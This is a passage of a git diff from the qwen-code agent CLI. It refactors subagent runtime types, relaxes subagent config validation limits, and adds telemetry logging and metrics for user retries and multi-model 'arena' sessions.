- } - }, - getPreferredEditor: () => undefined, - onEditorClose: () => {}, - }); - - // Prepare requests and emit TOOL_CALL events - const requests: ToolCallRequestInfo[] = authorizedCalls.map((fc) => { - const toolName = String(fc.name || 'unknown'); - const callId = fc.id ?? `${fc.name}-${Date.now()}`; - const args = (fc.args ?? {}) as Record; - const request: ToolCallRequestInfo = { - callId, - name: toolName, - args, - isClientInitiated: true, - prompt_id: promptId, - response_id: responseId, - }; - - const description = this.getToolDescription(toolName, args); - this.eventEmitter?.emit(SubAgentEventType.TOOL_CALL, { - subagentId: this.subagentId, - round: currentRound, - callId, - name: toolName, - args, - description, - timestamp: Date.now(), - } as SubAgentToolCallEvent); - - // pre-tool hook - void this.hooks?.preToolUse?.({ - subagentId: this.subagentId, - name: this.name, - toolName, - args, - timestamp: Date.now(), - }); - - return request; - }); - - if (requests.length > 0) { - // Create a per-batch completion promise, resolve when onAllToolCallsComplete fires - const batchDone = new Promise((resolve) => { - resolveBatch = () => { - resolve(); - resolveBatch = null; - }; - }); - await scheduler.schedule(requests, abortController.signal); - await batchDone; // Wait for approvals + execution to finish - } - // If all tool calls failed, inform the model so it can re-evaluate. - if (functionCalls.length > 0 && toolResponseParts.length === 0) { - toolResponseParts.push({ - text: 'All tool calls failed. Please analyze the errors and try an alternative approach.', - }); - } - - return [{ role: 'user', parts: toolResponseParts }]; - } - - getEventEmitter() { - return this.eventEmitter; - } - - getStatistics() { - const total = this.executionStats.totalToolCalls; - const successRate = - total > 0 ? 
(this.executionStats.successfulToolCalls / total) * 100 : 0; - return { - ...this.executionStats, - successRate, - toolUsage: Array.from(this.toolUsage.entries()).map(([name, v]) => ({ - name, - ...v, - })), - }; - } - - getExecutionSummary(): SubagentStatsSummary { - return this.stats.getSummary(); - } - - getFinalText(): string { - return this.finalText; - } - - getTerminateMode(): SubagentTerminateMode { - return this.terminateMode; - } - - private async createChatObject(context: ContextState) { - if (!this.promptConfig.systemPrompt && !this.promptConfig.initialMessages) { - throw new Error( - 'PromptConfig must have either `systemPrompt` or `initialMessages` defined.', - ); - } - if (this.promptConfig.systemPrompt && this.promptConfig.initialMessages) { - throw new Error( - 'PromptConfig cannot have both `systemPrompt` and `initialMessages` defined.', - ); - } - - const envHistory = await getInitialChatHistory(this.runtimeContext); - - const start_history = [ - ...envHistory, - ...(this.promptConfig.initialMessages ?? []), - ]; - - const systemInstruction = this.promptConfig.systemPrompt - ? this.buildChatSystemPrompt(context) - : undefined; - - try { - const generationConfig: GenerateContentConfig & { - systemInstruction?: string | Content; - } = { - temperature: this.modelConfig.temp, - topP: this.modelConfig.top_p, - }; - - if (systemInstruction) { - generationConfig.systemInstruction = systemInstruction; - } - - return new GeminiChat( - this.runtimeContext, - generationConfig, - start_history, - ); - } catch (error) { - await reportError( - error, - 'Error initializing chat session.', - start_history, - 'startChat', - ); - // The calling function will handle the undefined return. - return undefined; - } - } - - /** - * Safely retrieves the description of a tool by attempting to build it. - * Returns an empty string if any error occurs during the process. - * - * @param toolName The name of the tool to get description for. 
- * @param args The arguments that would be passed to the tool. - * @returns The tool description or empty string if error occurs. - */ - private getToolDescription( - toolName: string, - args: Record, - ): string { - try { - const toolRegistry = this.runtimeContext.getToolRegistry(); - const tool = toolRegistry.getTool(toolName); - if (!tool) { - return ''; - } - - const toolInstance = tool.build(args); - return toolInstance.getDescription() || ''; - } catch { - // Safely ignore all runtime errors and return empty string - return ''; - } - } - - /** - * Records tool call statistics for both successful and failed tool calls. - * This includes updating aggregate stats, per-tool usage, and the statistics service. - */ - private recordToolCallStats( - toolName: string, - success: boolean, - durationMs: number, - errorMessage?: string, - ): void { - // Update aggregate stats - this.executionStats.totalToolCalls += 1; - if (success) { - this.executionStats.successfulToolCalls += 1; - } else { - this.executionStats.failedToolCalls += 1; - } - - // Per-tool usage - const tu = this.toolUsage.get(toolName) || { - count: 0, - success: 0, - failure: 0, - totalDurationMs: 0, - averageDurationMs: 0, - }; - tu.count += 1; - if (success) { - tu.success += 1; - } else { - tu.failure += 1; - tu.lastError = errorMessage || 'Unknown error'; - } - tu.totalDurationMs = (tu.totalDurationMs || 0) + durationMs; - tu.averageDurationMs = tu.count > 0 ? tu.totalDurationMs / tu.count : 0; - this.toolUsage.set(toolName, tu); - - // Update statistics service - this.stats.recordToolCall( - toolName, - success, - durationMs, - this.toolUsage.get(toolName)?.lastError, - ); - } - - private buildChatSystemPrompt(context: ContextState): string { - if (!this.promptConfig.systemPrompt) { - // This should ideally be caught in createChatObject, but serves as a safeguard. 
- return ''; - } - - let finalPrompt = templateString(this.promptConfig.systemPrompt, context); - - // Add general non-interactive instructions. - finalPrompt += ` - -Important Rules: - - You operate in non-interactive mode: do not ask the user questions; proceed with available context. - - Use tools only when necessary to obtain facts or make changes. - - When the task is complete, return the final result as a normal model response (not a tool call) and stop.`; - - // Append user memory (QWEN.md + output-language.md) to ensure subagent respects project conventions - const userMemory = this.runtimeContext.getUserMemory(); - if (userMemory && userMemory.trim().length > 0) { - finalPrompt += `\n\n---\n\n${userMemory.trim()}`; - } - - return finalPrompt; - } -} diff --git a/packages/core/src/subagents/types.ts b/packages/core/src/subagents/types.ts index efa73a7e4..55e57f61e 100644 --- a/packages/core/src/subagents/types.ts +++ b/packages/core/src/subagents/types.ts @@ -4,7 +4,19 @@ * SPDX-License-Identifier: Apache-2.0 */ -import type { Content, FunctionDeclaration } from '@google/genai'; +/** + * @fileoverview Subagent configuration types. + * + * Agent runtime types (PromptConfig, ModelConfig, RunConfig, ToolConfig, + * AgentTerminateMode) are canonically defined in agents/runtime/agent-types.ts. + */ + +import type { + ModelConfig, + RunConfig, + PromptConfig, + ToolConfig, +} from '../agents/runtime/agent-types.js'; /** * Represents the storage level for a subagent configuration. @@ -24,7 +36,7 @@ export type SubagentLevel = /** * Core configuration for a subagent as stored in Markdown files. * This interface represents the file-based configuration that gets - * converted to runtime configuration for SubAgentScope. + * converted to runtime configuration for AgentHeadless. 
*/ export interface SubagentConfig { /** Unique name identifier for the subagent */ @@ -82,20 +94,20 @@ export interface SubagentConfig { } /** - * Runtime configuration that converts file-based config to existing SubAgentScope. + * Runtime configuration that converts file-based config to AgentHeadless. * This interface maps SubagentConfig to the existing runtime interfaces. */ export interface SubagentRuntimeConfig { - /** Prompt configuration for SubAgentScope */ + /** Prompt configuration for AgentHeadless */ promptConfig: PromptConfig; - /** Model configuration for SubAgentScope */ + /** Model configuration for AgentHeadless */ modelConfig: ModelConfig; - /** Runtime execution configuration for SubAgentScope */ + /** Runtime execution configuration for AgentHeadless */ runConfig: RunConfig; - /** Optional tool configuration for SubAgentScope */ + /** Optional tool configuration for AgentHeadless */ toolConfig?: ToolConfig; } @@ -176,97 +188,3 @@ export const SubagentErrorCode = { export type SubagentErrorCode = (typeof SubagentErrorCode)[keyof typeof SubagentErrorCode]; - -/** - * Describes the possible termination modes for a subagent. - * This enum provides a clear indication of why a subagent's execution might have ended. - */ -export enum SubagentTerminateMode { - /** - * Indicates that the subagent's execution terminated due to an unrecoverable error. - */ - ERROR = 'ERROR', - /** - * Indicates that the subagent's execution terminated because it exceeded the maximum allowed working time. - */ - TIMEOUT = 'TIMEOUT', - /** - * Indicates that the subagent's execution successfully completed all its defined goals. - */ - GOAL = 'GOAL', - /** - * Indicates that the subagent's execution terminated because it exceeded the maximum number of turns. - */ - MAX_TURNS = 'MAX_TURNS', - /** - * Indicates that the subagent's execution was cancelled via an abort signal. - */ - CANCELLED = 'CANCELLED', -} - -/** - * Configures the initial prompt for the subagent. 
- */ -export interface PromptConfig { - /** - * A single system prompt string that defines the subagent's persona and instructions. - * Note: You should use either `systemPrompt` or `initialMessages`, but not both. - */ - systemPrompt?: string; - - /** - * An array of user/model content pairs to seed the chat history for few-shot prompting. - * Note: You should use either `systemPrompt` or `initialMessages`, but not both. - */ - initialMessages?: Content[]; -} - -/** - * Configures the tools available to the subagent during its execution. - */ -export interface ToolConfig { - /** - * A list of tool names (from the tool registry) or full function declarations - * that the subagent is permitted to use. - */ - tools: Array; -} - -/** - * Configures the generative model parameters for the subagent. - * This interface specifies the model to be used and its associated generation settings, - * such as temperature and top-p values, which influence the creativity and diversity of the model's output. - */ -export interface ModelConfig { - /** - * The name or identifier of the model to be used (e.g., 'qwen3-coder-plus'). - * - * TODO: In the future, this needs to support 'auto' or some other string to support routing use cases. - */ - model?: string; - /** - * The temperature for the model's sampling process. - */ - temp?: number; - /** - * The top-p value for nucleus sampling. - */ - top_p?: number; -} - -/** - * Configures the execution environment and constraints for the subagent. - * This interface defines parameters that control the subagent's runtime behavior, - * such as maximum execution time, to prevent infinite loops or excessive resource consumption. - * - * TODO: Consider adding max_tokens as a form of budgeting. - */ -export interface RunConfig { - /** The maximum execution time for the subagent in minutes. */ - max_time_minutes?: number; - /** - * The maximum number of conversational turns (a user message + model response) - * before the execution is terminated. 
Helps prevent infinite loops. - */ - max_turns?: number; -} diff --git a/packages/core/src/subagents/validation.test.ts b/packages/core/src/subagents/validation.test.ts index 26819845d..1d705cc0d 100644 --- a/packages/core/src/subagents/validation.test.ts +++ b/packages/core/src/subagents/validation.test.ts @@ -164,21 +164,12 @@ describe('SubagentValidator', () => { ); }); - it('should reject prompts that are too long', () => { - const longPrompt = 'a'.repeat(10001); - const result = validator.validateSystemPrompt(longPrompt); - expect(result.isValid).toBe(false); - expect(result.errors).toContain( - 'System prompt is too long (>10,000 characters)', - ); - }); - it('should warn about long prompts', () => { - const longPrompt = 'a'.repeat(5001); + const longPrompt = 'a'.repeat(10001); const result = validator.validateSystemPrompt(longPrompt); expect(result.isValid).toBe(true); expect(result.warnings).toContain( - 'System prompt is quite long (>5,000 characters), consider shortening', + 'System prompt is quite long (>10,000 characters), consider shortening', ); }); }); @@ -372,7 +363,7 @@ describe('SubagentValidator', () => { const configWithWarnings: SubagentConfig = { ...validConfig, name: 'TestAgent', // Will generate warning about case - description: 'A'.repeat(501), // Will generate warning about long description + description: 'A'.repeat(1001), // Will generate warning about long description }; const result = validator.validateConfig(configWithWarnings); diff --git a/packages/core/src/subagents/validation.ts b/packages/core/src/subagents/validation.ts index 5df8cc315..15fb31269 100644 --- a/packages/core/src/subagents/validation.ts +++ b/packages/core/src/subagents/validation.ts @@ -5,12 +5,8 @@ */ import { SubagentError, SubagentErrorCode } from './types.js'; -import type { - ModelConfig, - RunConfig, - SubagentConfig, - ValidationResult, -} from './types.js'; +import type { SubagentConfig, ValidationResult } from './types.js'; +import type { ModelConfig, 
RunConfig } from '../agents/runtime/agent-types.js'; /** * Validates subagent configurations to ensure they are well-formed @@ -36,9 +32,9 @@ export class SubagentValidator { // Validate description if (!config.description || config.description.trim().length === 0) { errors.push('Description is required and cannot be empty'); - } else if (config.description.length > 500) { + } else if (config.description.length > 1000) { warnings.push( - 'Description is quite long (>500 chars), consider shortening for better readability', + 'Description is quite long (>1,000 chars), consider shortening for better readability', ); } @@ -181,12 +177,10 @@ export class SubagentValidator { errors.push('System prompt must be at least 10 characters long'); } - // Check maximum length to prevent token issues + // Warn for very long prompts if (trimmedPrompt.length > 10000) { - errors.push('System prompt is too long (>10,000 characters)'); - } else if (trimmedPrompt.length > 5000) { warnings.push( - 'System prompt is quite long (>5,000 characters), consider shortening', + 'System prompt is quite long (>10,000 characters), consider shortening', ); } diff --git a/packages/core/src/telemetry/constants.ts b/packages/core/src/telemetry/constants.ts index cea2188eb..6de60015b 100644 --- a/packages/core/src/telemetry/constants.ts +++ b/packages/core/src/telemetry/constants.ts @@ -7,6 +7,7 @@ export const SERVICE_NAME = 'qwen-code'; export const EVENT_USER_PROMPT = 'qwen-code.user_prompt'; +export const EVENT_USER_RETRY = 'qwen-code.user_retry'; export const EVENT_TOOL_CALL = 'qwen-code.tool_call'; export const EVENT_API_REQUEST = 'qwen-code.api_request'; export const EVENT_API_ERROR = 'qwen-code.api_error'; @@ -38,6 +39,11 @@ export const EVENT_SKILL_LAUNCH = 'qwen-code.skill_launch'; export const EVENT_AUTH = 'qwen-code.auth'; export const EVENT_USER_FEEDBACK = 'qwen-code.user_feedback'; +// Arena Events +export const EVENT_ARENA_SESSION_STARTED = 'qwen-code.arena_session_started'; +export const 
EVENT_ARENA_AGENT_COMPLETED = 'qwen-code.arena_agent_completed'; +export const EVENT_ARENA_SESSION_ENDED = 'qwen-code.arena_session_ended'; + // Performance Events export const EVENT_STARTUP_PERFORMANCE = 'qwen-code.startup.performance'; export const EVENT_MEMORY_USAGE = 'qwen-code.memory.usage'; diff --git a/packages/core/src/telemetry/index.ts b/packages/core/src/telemetry/index.ts index 0f5981ed4..596db3fa1 100644 --- a/packages/core/src/telemetry/index.ts +++ b/packages/core/src/telemetry/index.ts @@ -27,6 +27,7 @@ export { export { logStartSession, logUserPrompt, + logUserRetry, logToolCall, logApiRequest, logApiError, @@ -48,12 +49,16 @@ export { logAuth, logSkillLaunch, logUserFeedback, + logArenaSessionStarted, + logArenaAgentCompleted, + logArenaSessionEnded, } from './loggers.js'; export type { SlashCommandEvent, ChatCompressionEvent } from './types.js'; export { SlashCommandStatus, EndSessionEvent, UserPromptEvent, + UserRetryEvent, ApiRequestEvent, ApiErrorEvent, ApiResponseEvent, @@ -70,8 +75,18 @@ export { SkillLaunchEvent, UserFeedbackEvent, UserFeedbackRating, + makeArenaSessionStartedEvent, + makeArenaAgentCompletedEvent, + makeArenaSessionEndedEvent, } from './types.js'; export { makeSlashCommandEvent, makeChatCompressionEvent } from './types.js'; +export type { + ArenaSessionStartedEvent, + ArenaAgentCompletedEvent, + ArenaSessionEndedEvent, + ArenaSessionEndedStatus, + ArenaAgentCompletedStatus, +} from './types.js'; export type { TelemetryEvent } from './types.js'; export { SpanStatusCode, ValueType } from '@opentelemetry/api'; export { SemanticAttributes } from '@opentelemetry/semantic-conventions'; @@ -98,6 +113,10 @@ export { recordPerformanceRegression, recordBaselineComparison, isPerformanceMonitoringActive, + // Arena metrics functions + recordArenaSessionStartedMetrics, + recordArenaAgentCompletedMetrics, + recordArenaSessionEndedMetrics, // Performance monitoring types PerformanceMetricType, MemoryMetricType, diff --git 
a/packages/core/src/telemetry/loggers.test.ts b/packages/core/src/telemetry/loggers.test.ts index ab026304a..34d142c4f 100644 --- a/packages/core/src/telemetry/loggers.test.ts +++ b/packages/core/src/telemetry/loggers.test.ts @@ -148,15 +148,11 @@ describe('loggers', () => { const mockConfig = { getSessionId: () => 'test-session-id', getModel: () => 'test-model', - getEmbeddingModel: () => 'test-embedding-model', getSandbox: () => true, getCoreTools: () => ['ls', 'read-file'], getApprovalMode: () => 'default', - getContentGeneratorConfig: () => ({ - model: 'test-model', - apiKey: 'test-api-key', - authType: AuthType.USE_VERTEX_AI, - }), + getTruncateToolOutputThreshold: () => 25000, + getTruncateToolOutputLines: () => 1000, getTelemetryEnabled: () => true, getUsageStatisticsEnabled: () => true, getTelemetryLogPromptsEnabled: () => true, @@ -174,6 +170,9 @@ describe('loggers', () => { getOutputFormat: () => OutputFormat.JSON, getToolRegistry: () => undefined, getChatRecordingService: () => undefined, + getHookSystem: () => undefined, + getIdeMode: () => false, + getShouldUseNodePtyShell: () => true, } as unknown as Config; const startSessionEvent = new StartSessionEvent(mockConfig); @@ -186,19 +185,20 @@ describe('loggers', () => { 'event.name': EVENT_CLI_CONFIG, 'event.timestamp': '2025-01-01T00:00:00.000Z', model: 'test-model', - embedding_model: 'test-embedding-model', sandbox_enabled: true, core_tools_enabled: 'ls,read-file', approval_mode: 'default', - api_key_enabled: true, - vertex_ai_enabled: true, - log_user_prompts_enabled: true, + truncate_tool_output_threshold: 25000, + truncate_tool_output_lines: 1000, file_filtering_respect_git_ignore: true, debug_mode: true, mcp_servers: 'test-server', mcp_servers_count: 1, mcp_tools: undefined, mcp_tools_count: undefined, + hooks: undefined, + ide_enabled: false, + interactive_shell_enabled: true, output_format: 'json', skills: undefined, subagents: undefined, diff --git a/packages/core/src/telemetry/loggers.ts 
b/packages/core/src/telemetry/loggers.ts index d15d1bcb7..0a7842f38 100644 --- a/packages/core/src/telemetry/loggers.ts +++ b/packages/core/src/telemetry/loggers.ts @@ -20,6 +20,7 @@ import { EVENT_IDE_CONNECTION, EVENT_TOOL_CALL, EVENT_USER_PROMPT, + EVENT_USER_RETRY, EVENT_FLASH_FALLBACK, EVENT_NEXT_SPEAKER_CHECK, SERVICE_NAME, @@ -40,6 +41,9 @@ import { EVENT_SKILL_LAUNCH, EVENT_EXTENSION_UPDATE, EVENT_USER_FEEDBACK, + EVENT_ARENA_SESSION_STARTED, + EVENT_ARENA_AGENT_COMPLETED, + EVENT_ARENA_SESSION_ENDED, } from './constants.js'; import { recordApiErrorMetrics, @@ -53,6 +57,9 @@ import { recordSubagentExecutionMetrics, recordTokenUsageMetrics, recordToolCallMetrics, + recordArenaSessionStartedMetrics, + recordArenaAgentCompletedMetrics, + recordArenaSessionEndedMetrics, } from './metrics.js'; import { QwenLogger } from './qwen-logger/qwen-logger.js'; import { isTelemetrySdkInitialized } from './sdk.js'; @@ -66,6 +73,7 @@ import type { StartSessionEvent, ToolCallEvent, UserPromptEvent, + UserRetryEvent, FlashFallbackEvent, NextSpeakerCheckEvent, LoopDetectedEvent, @@ -90,6 +98,9 @@ import type { AuthEvent, SkillLaunchEvent, UserFeedbackEvent, + ArenaSessionStartedEvent, + ArenaAgentCompletedEvent, + ArenaSessionEndedEvent, } from './types.js'; import type { UiEvent } from './uiTelemetry.js'; import { uiTelemetryService } from './uiTelemetry.js'; @@ -115,19 +126,20 @@ export function logStartSession( 'event.name': EVENT_CLI_CONFIG, 'event.timestamp': new Date().toISOString(), model: event.model, - embedding_model: event.embedding_model, sandbox_enabled: event.sandbox_enabled, core_tools_enabled: event.core_tools_enabled, approval_mode: event.approval_mode, - api_key_enabled: event.api_key_enabled, - vertex_ai_enabled: event.vertex_ai_enabled, - log_user_prompts_enabled: event.telemetry_log_user_prompts_enabled, file_filtering_respect_git_ignore: event.file_filtering_respect_git_ignore, debug_mode: event.debug_enabled, + truncate_tool_output_threshold: 
event.truncate_tool_output_threshold, + truncate_tool_output_lines: event.truncate_tool_output_lines, mcp_servers: event.mcp_servers, mcp_servers_count: event.mcp_servers_count, mcp_tools: event.mcp_tools, mcp_tools_count: event.mcp_tools_count, + hooks: event.hooks, + ide_enabled: event.ide_enabled, + interactive_shell_enabled: event.interactive_shell_enabled, output_format: event.output_format, skills: event.skills, subagents: event.subagents, @@ -169,6 +181,25 @@ export function logUserPrompt(config: Config, event: UserPromptEvent): void { logger.emit(logRecord); } +export function logUserRetry(config: Config, event: UserRetryEvent): void { + QwenLogger.getInstance(config)?.logRetryEvent(event); + if (!isTelemetrySdkInitialized()) return; + + const attributes: LogAttributes = { + ...getCommonAttributes(config), + 'event.name': EVENT_USER_RETRY, + 'event.timestamp': new Date().toISOString(), + prompt_id: event.prompt_id, + }; + + const logger = logs.getLogger(SERVICE_NAME); + const logRecord: LogRecord = { + body: `User retry.`, + attributes, + }; + logger.emit(logRecord); +} + export function logToolCall(config: Config, event: ToolCallEvent): void { const uiEvent = { ...event, @@ -353,7 +384,7 @@ export function logApiError(config: Config, event: ApiErrorEvent): void { ...event, 'event.name': EVENT_API_ERROR, 'event.timestamp': new Date().toISOString(), - ['error.message']: event.error, + ['error.message']: event.error_message, model_name: event.model, duration: event.duration_ms, }; @@ -367,7 +398,7 @@ export function logApiError(config: Config, event: ApiErrorEvent): void { const logger = logs.getLogger(SERVICE_NAME); const logRecord: LogRecord = { - body: `API error for ${event.model}. Error: ${event.error}. Duration: ${event.duration_ms}ms.`, + body: `API error for ${event.model}. Error: ${event.error_message}. 
Duration: ${event.duration_ms}ms.`, attributes, }; logger.emit(logRecord); @@ -946,3 +977,86 @@ export function logUserFeedback( }; logger.emit(logRecord); } + +export function logArenaSessionStarted( + config: Config, + event: ArenaSessionStartedEvent, +): void { + QwenLogger.getInstance(config)?.logArenaSessionStartedEvent(event); + if (!isTelemetrySdkInitialized()) return; + + const attributes: LogAttributes = { + ...getCommonAttributes(config), + ...event, + model_ids: JSON.stringify(event.model_ids), + 'event.name': EVENT_ARENA_SESSION_STARTED, + 'event.timestamp': new Date().toISOString(), + }; + + const logger = logs.getLogger(SERVICE_NAME); + const logRecord: LogRecord = { + body: `Arena session started. Agents: ${event.model_ids.length}.`, + attributes, + }; + logger.emit(logRecord); + recordArenaSessionStartedMetrics(config); +} + +export function logArenaAgentCompleted( + config: Config, + event: ArenaAgentCompletedEvent, +): void { + QwenLogger.getInstance(config)?.logArenaAgentCompletedEvent(event); + if (!isTelemetrySdkInitialized()) return; + + const attributes: LogAttributes = { + ...getCommonAttributes(config), + ...event, + 'event.name': EVENT_ARENA_AGENT_COMPLETED, + 'event.timestamp': new Date().toISOString(), + }; + + const logger = logs.getLogger(SERVICE_NAME); + const logRecord: LogRecord = { + body: `Arena agent ${event.agent_model_id} ${event.status}. Duration: ${event.duration_ms}ms. 
Tokens: ${event.total_tokens}.`, + attributes, + }; + logger.emit(logRecord); + recordArenaAgentCompletedMetrics( + config, + event.agent_model_id, + event.status, + event.duration_ms, + event.input_tokens, + event.output_tokens, + ); +} + +export function logArenaSessionEnded( + config: Config, + event: ArenaSessionEndedEvent, +): void { + QwenLogger.getInstance(config)?.logArenaSessionEndedEvent(event); + if (!isTelemetrySdkInitialized()) return; + + const attributes: LogAttributes = { + ...getCommonAttributes(config), + ...event, + 'event.name': EVENT_ARENA_SESSION_ENDED, + 'event.timestamp': new Date().toISOString(), + }; + + const logger = logs.getLogger(SERVICE_NAME); + const logRecord: LogRecord = { + body: `Arena session ended: ${event.status}.${event.winner_model_id ? ` Winner: ${event.winner_model_id}.` : ''}`, + attributes, + }; + logger.emit(logRecord); + recordArenaSessionEndedMetrics( + config, + event.status, + event.display_backend, + event.duration_ms, + event.winner_model_id, + ); +} diff --git a/packages/core/src/telemetry/metrics.ts b/packages/core/src/telemetry/metrics.ts index 0ab499e0f..f71498c36 100644 --- a/packages/core/src/telemetry/metrics.ts +++ b/packages/core/src/telemetry/metrics.ts @@ -23,6 +23,14 @@ const CONTENT_RETRY_FAILURE_COUNT = `${SERVICE_NAME}.chat.content_retry_failure. 
const MODEL_SLASH_COMMAND_CALL_COUNT = `${SERVICE_NAME}.slash_command.model.call_count`; export const SUBAGENT_EXECUTION_COUNT = `${SERVICE_NAME}.subagent.execution.count`; +// Arena Metrics +const ARENA_SESSION_COUNT = `${SERVICE_NAME}.arena.session.count`; +const ARENA_SESSION_DURATION = `${SERVICE_NAME}.arena.session.duration`; +const ARENA_AGENT_COUNT = `${SERVICE_NAME}.arena.agent.count`; +const ARENA_AGENT_DURATION = `${SERVICE_NAME}.arena.agent.duration`; +const ARENA_AGENT_TOKENS = `${SERVICE_NAME}.arena.agent.tokens`; +const ARENA_RESULT_SELECTED = `${SERVICE_NAME}.arena.result.selected`; + // Performance Monitoring Metrics const STARTUP_TIME = `${SERVICE_NAME}.startup.duration`; const MEMORY_USAGE = `${SERVICE_NAME}.memory.usage`; @@ -345,6 +353,14 @@ let performanceScoreGauge: Histogram | undefined; let regressionDetectionCounter: Counter | undefined; let regressionPercentageChangeHistogram: Histogram | undefined; let baselineComparisonHistogram: Histogram | undefined; +// Arena Metrics +let arenaSessionCounter: Counter | undefined; +let arenaSessionDurationHistogram: Histogram | undefined; +let arenaAgentCounter: Counter | undefined; +let arenaAgentDurationHistogram: Histogram | undefined; +let arenaAgentTokensCounter: Counter | undefined; +let arenaResultSelectedCounter: Counter | undefined; + let isMetricsInitialized = false; let isPerformanceMonitoringEnabled = false; @@ -373,6 +389,37 @@ export function initializeMetrics(config: Config): void { valueType: ValueType.INT, }); + // Arena metrics + arenaSessionCounter = meter.createCounter(ARENA_SESSION_COUNT, { + description: 'Counts arena sessions by status and display backend.', + valueType: ValueType.INT, + }); + arenaSessionDurationHistogram = meter.createHistogram( + ARENA_SESSION_DURATION, + { + description: 'Duration of arena sessions in milliseconds.', + unit: 'ms', + valueType: ValueType.INT, + }, + ); + arenaAgentCounter = meter.createCounter(ARENA_AGENT_COUNT, { + description: 'Counts arena 
agent completions by status and model.', + valueType: ValueType.INT, + }); + arenaAgentDurationHistogram = meter.createHistogram(ARENA_AGENT_DURATION, { + description: 'Duration of arena agent execution in milliseconds.', + unit: 'ms', + valueType: ValueType.INT, + }); + arenaAgentTokensCounter = meter.createCounter(ARENA_AGENT_TOKENS, { + description: 'Token usage by arena agents.', + valueType: ValueType.INT, + }); + arenaResultSelectedCounter = meter.createCounter(ARENA_RESULT_SELECTED, { + description: 'Counts arena result selections by model.', + valueType: ValueType.INT, + }); + Object.entries(HISTOGRAM_DEFINITIONS).forEach( ([name, { description, unit, valueType, assign }]) => { assign(meter.createHistogram(name, { description, unit, valueType })); @@ -747,3 +794,85 @@ export function recordSubagentExecutionMetrics( subagentExecutionCounter.add(1, attributes); } + +// ─── Arena Metric Recording Functions ─────────────────────────── + +export function recordArenaSessionStartedMetrics(config: Config): void { + if (!isMetricsInitialized) return; + arenaSessionCounter?.add(1, { + ...baseMetricDefinition.getCommonAttributes(config), + status: 'started', + }); +} + +export function recordArenaAgentCompletedMetrics( + config: Config, + modelId: string, + status: string, + durationMs: number, + inputTokens: number, + outputTokens: number, +): void { + if (!isMetricsInitialized) return; + + const common = baseMetricDefinition.getCommonAttributes(config); + + arenaAgentCounter?.add(1, { + ...common, + status, + model_id: modelId, + }); + + arenaAgentDurationHistogram?.record(durationMs, { + ...common, + model_id: modelId, + }); + + if (inputTokens > 0) { + arenaAgentTokensCounter?.add(inputTokens, { + ...common, + model_id: modelId, + type: 'input', + }); + } + + if (outputTokens > 0) { + arenaAgentTokensCounter?.add(outputTokens, { + ...common, + model_id: modelId, + type: 'output', + }); + } +} + +export function recordArenaSessionEndedMetrics( + config: Config, + 
status: string, + displayBackend?: string, + durationMs?: number, + winnerModelId?: string, +): void { + if (!isMetricsInitialized) return; + + const common = baseMetricDefinition.getCommonAttributes(config); + + arenaSessionCounter?.add(1, { + ...common, + status, + ...(displayBackend ? { display_backend: displayBackend } : {}), + }); + + if (durationMs !== undefined && arenaSessionDurationHistogram) { + arenaSessionDurationHistogram.record(durationMs, { + ...common, + status, + }); + } + + if (winnerModelId) { + arenaResultSelectedCounter?.add(1, { + ...common, + model_id: winnerModelId, + }); + } +} diff --git a/packages/core/src/telemetry/qwen-logger/qwen-logger.test.ts b/packages/core/src/telemetry/qwen-logger/qwen-logger.test.ts index 6cc0f230a..352d90e12 100644 --- a/packages/core/src/telemetry/qwen-logger/qwen-logger.test.ts +++ b/packages/core/src/telemetry/qwen-logger/qwen-logger.test.ts @@ -81,6 +81,11 @@ const makeFakeConfig = (overrides: Partial = {}): Config => { getFileFilteringRespectGitIgnore: () => true, getOutputFormat: () => 'text', getToolRegistry: () => undefined, + getTruncateToolOutputThreshold: () => 25000, + getTruncateToolOutputLines: () => 0, + getIdeMode: () => false, + getShouldUseNodePtyShell: () => false, + getHookSystem: () => undefined, ...overrides, }; return defaults as Config; diff --git a/packages/core/src/telemetry/qwen-logger/qwen-logger.ts b/packages/core/src/telemetry/qwen-logger/qwen-logger.ts index 6d30e13e1..b0bb22bb0 100644 --- a/packages/core/src/telemetry/qwen-logger/qwen-logger.ts +++ b/packages/core/src/telemetry/qwen-logger/qwen-logger.ts @@ -42,9 +42,13 @@ import type { AuthEvent, SkillLaunchEvent, UserFeedbackEvent, + UserRetryEvent, RipgrepFallbackEvent, EndSessionEvent, ExtensionUpdateEvent, + ArenaSessionStartedEvent, + ArenaAgentCompletedEvent, + ArenaSessionEndedEvent, } from '../types.js'; import type { RumEvent, @@ -415,20 +419,20 @@ export class QwenLogger { const applicationEvent = 
this.createViewEvent('session', 'session_start', { properties: { - model: event.model, approval_mode: event.approval_mode, - embedding_model: event.embedding_model, - sandbox_enabled: event.sandbox_enabled, core_tools_enabled: event.core_tools_enabled, - api_key_enabled: event.api_key_enabled, - vertex_ai_enabled: event.vertex_ai_enabled, debug_enabled: event.debug_enabled, + hooks: event.hooks, + ide_enabled: event.ide_enabled, + interactive_shell_enabled: event.interactive_shell_enabled, mcp_servers: event.mcp_servers, - telemetry_enabled: event.telemetry_enabled, - telemetry_log_user_prompts_enabled: - event.telemetry_log_user_prompts_enabled, + model: event.model, + sandbox_enabled: event.sandbox_enabled, skills: event.skills, subagents: event.subagents, + telemetry_enabled: event.telemetry_enabled, + truncate_tool_output_lines: event.truncate_tool_output_lines, + truncate_tool_output_threshold: event.truncate_tool_output_threshold, }, }); @@ -465,7 +469,6 @@ export class QwenLogger { logNewPromptEvent(event: UserPromptEvent): void { const rumEvent = this.createActionEvent('user', 'new_prompt', { properties: { - auth_type: event.auth_type, prompt_id: event.prompt_id, prompt_length: event.prompt_length, }, @@ -475,6 +478,17 @@ export class QwenLogger { this.flushIfNeeded(); } + logRetryEvent(event: UserRetryEvent): void { + const rumEvent = this.createActionEvent('user', 'retry', { + properties: { + prompt_id: event.prompt_id, + }, + }); + + this.enqueueLogEvent(rumEvent); + this.flushIfNeeded(); + } + logSlashCommandEvent(event: SlashCommandEvent): void { const rumEvent = this.createActionEvent('user', 'slash_command', { properties: { @@ -631,12 +645,13 @@ export class QwenLogger { status_code: event.status_code?.toString() ?? 
